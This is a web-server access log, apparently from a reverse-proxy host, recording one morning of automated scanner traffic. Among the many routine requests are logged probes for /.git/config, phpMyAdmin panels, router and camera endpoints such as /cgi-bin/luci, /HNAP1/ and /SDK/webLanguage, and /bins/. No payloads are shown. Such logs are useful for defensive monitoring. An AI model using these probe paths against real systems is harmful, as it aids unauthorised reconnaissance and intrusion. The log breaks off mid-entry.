78.131.122.113 "/" [Client 162.216.149.16] [Length 568] [Gzip 1.86] "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity" "-" +[02/Feb/2026:05:43:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:49:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:05:59:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 139.59.210.36] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:06:08:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:06:11:51 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 194.165.16.163] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:06:12:13 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:06:12:21 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[02/Feb/2026:06:15:42 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:06:17:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:06:27:03 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 93.174.93.12] [Length 1033] [Gzip -] "Mozilla/5.0 (Linux; Android 9; MHA-AL00 Build/HUAWEIMHA-AL00; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/71.0.3578.99 Mobile Safari/537.36 MMWEBID/9772 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN" "-" +[02/Feb/2026:06:32:09 +0000] 400 - GET http 78.131.122.113 "/" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:06:32:13 +0000] 400 - - http localhost "-" [Client 162.142.125.43] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:06:32:21 +0000] 400 - GET http 78.131.122.113 "/login" [Client 162.142.125.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:06:38:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:06:42:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:06:43:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:06:46:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 146.19.24.133] [Length 568] [Gzip 1.86] "-" "-" +[02/Feb/2026:07:00:58 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:06:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:08:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:07:11:46 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:07:14:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:30:54 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:34:24 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:40:24 +0000] 404 - GET http 78.131.122.113 "/bins/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:07:47:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 45.172.1.106] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/601.7.7 (KHTML, like Gecko) Version/9.1.2 Safari/601.7.7" "-" +[02/Feb/2026:07:47:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:49:39 +0000] 404 - GET http 78.131.122.113 "/cgi-bin/luci/;stok=/locale" [Client 91.224.92.115] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:07:54:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:58:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:07:58:53 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:05:11 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:08:42 +0000] 400 - - http localhost "-" [Client 80.94.95.221] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:13:28 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:21:42 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:21:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:22:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:08:23:20 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:08:23:27 +0000] 200 - GET http 78.131.122.113 "/" [Client 3.143.33.63] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[02/Feb/2026:08:24:21 +0000] 200 - GET http 78.131.122.113 "/" [Client 3.143.33.63] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[02/Feb/2026:08:25:31 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:26:18 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:27:15 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.143.33.63] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:31:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:41:48 +0000] 400 - GET http 78.131.122.113 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[02/Feb/2026:08:44:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:44:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[02/Feb/2026:08:46:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:08:48:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 162.142.125.220] [Length 568] [Gzip 1.86] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:08:48:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:48:17 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:08:48:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:48:25 +0000] 404 - GET http 78.131.122.113 "/wiki" [Client 162.142.125.220] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" +[02/Feb/2026:08:48:29 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 162.142.125.220] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:52:57 +0000] 400 - - http localhost "-" [Client 85.217.140.9] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:08:53:23 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 40.76.137.103] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:08:53:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:01:56 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 144.91.73.85] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:11:48 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:19:08 +0000] 404 - GET http 78.131.122.113 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[02/Feb/2026:09:22:50 +0000] 405 - POST http 78.131.122.113 "/" [Client 2.58.56.147] [Length 556] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:22:51 +0000] 404 - POST http 78.131.122.113 "/_next" [Client 2.58.56.147] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Linux; U; Android 4.2.2; he-il; NEO-X5-116A Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30" "-" +[02/Feb/2026:09:22:51 +0000] 404 - POST http 78.131.122.113 "/api" [Client 2.58.56.147] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:22:52 +0000] 404 - POST http 78.131.122.113 "/_next/server" [Client 2.58.56.147] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0" "-" +[02/Feb/2026:09:22:52 +0000] 404 - POST http 78.131.122.113 "/app" [Client 2.58.56.147] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:22:52 +0000] 404 - POST http 78.131.122.113 "/api/route" [Client 2.58.56.147] [Length 183] [Gzip 3.21] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[02/Feb/2026:09:23:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:27:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:34:45 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:35:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 34.76.70.200] [Length 568] [Gzip 1.86] "python-requests/2.32.5" "-" +[02/Feb/2026:09:35:19 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 64.62.156.212] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:09:40:44 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:09:51:39 +0000] 400 - GET http 78.131.122.113 "/page/style/index.css" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[02/Feb/2026:09:58:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:02:42 +0000] 404 - GET http 78.131.122.113 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[02/Feb/2026:10:02:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:03:57 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 34.12.186.91] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:10:03:58 +0000] 405 - OPTIONS http 78.131.122.113 "/" [Client 34.12.186.91] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:10:06:27 +0000] 200 - GET http 78.131.122.113 "/" [Client 109.105.8.93] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "-" +[02/Feb/2026:10:06:27 +0000] 404 - GET http www.msftncsi.com "/ncsi.txt" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[02/Feb/2026:10:06:27 +0000] 404 - GET http 78.131.122.113 "/HNAP1/" [Client 109.105.8.93] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1" "http://78.131.122.113/" +[02/Feb/2026:10:14:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:28:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:29:08 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:30:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:37:57 +0000] 200 - GET http 78.131.122.113 "/" [Client 176.65.139.7] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:10:50:51 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[02/Feb/2026:10:53:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:03:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:06:34 +0000] 404 - HEAD http 78.131.122.113 "/phpmyadmin/" [Client 122.9.140.40] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:11:06:35 +0000] 404 - HEAD http 78.131.122.113 "/mysqladmin/" [Client 122.9.140.40] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:11:06:35 +0000] 404 - HEAD http 78.131.122.113 "/phpMyAdmin4.8.5/" [Client 122.9.140.40] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:11:06:35 +0000] 404 - HEAD http 78.131.122.113 "/pma/" [Client 122.9.140.40] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:11:06:36 +0000] 404 - HEAD http 78.131.122.113 "/pmd/" [Client 122.9.140.40] [Length 0] [Gzip -] "-" "-" +[02/Feb/2026:11:08:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:15:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:21:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:31:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:46:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:11:57:18 +0000] 404 - GET http 78.131.122.113 "/cgi/conf.bin" [Client 194.50.16.253] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.97 Safari/537.11" "http://78.131.122.113:80/mainFrame.htm" +[02/Feb/2026:12:02:22 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:03:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:12:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:14:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:20:42 +0000] 200 - GET http 78.131.122.113 "/" [Client 71.6.232.30] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36" "-" +[02/Feb/2026:12:23:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 146.19.24.133] [Length 1033] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36" "-" +[02/Feb/2026:12:33:02 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:40:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:12:46:42 +0000] 400 - GET http 78.131.122.113 "/" [Client 20.14.89.155] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" +[02/Feb/2026:12:46:42 +0000] 400 - - http localhost "-" [Client 20.14.89.155] [Length 154] [Gzip -] "-" "-" +[02/Feb/2026:13:03:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:03:43 +0000] 404 - GET http 78.131.122.113 "/SDK/webLanguage" [Client 5.61.209.92] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:04:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:04:33 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:05:30 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[02/Feb/2026:13:12:26 +0000] 404 - GET http 78.131.122.113 "/.git/config" [Client 213.209.159.181] [Length 122] [Gzip 1.35] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0" "-" +[02/Feb/2026:13:12:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 43.248.109.175] [Length 1033] [Gzip -] "-" "-" +[02/Feb/2026:13:12:59 +0000] 200 - GET http 78.131.122.113 "/" [Client 223.199.189.250] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36" "-" +[02/Feb/2026:13:13:00 +0000] 400 - GET http 78.131.122.113 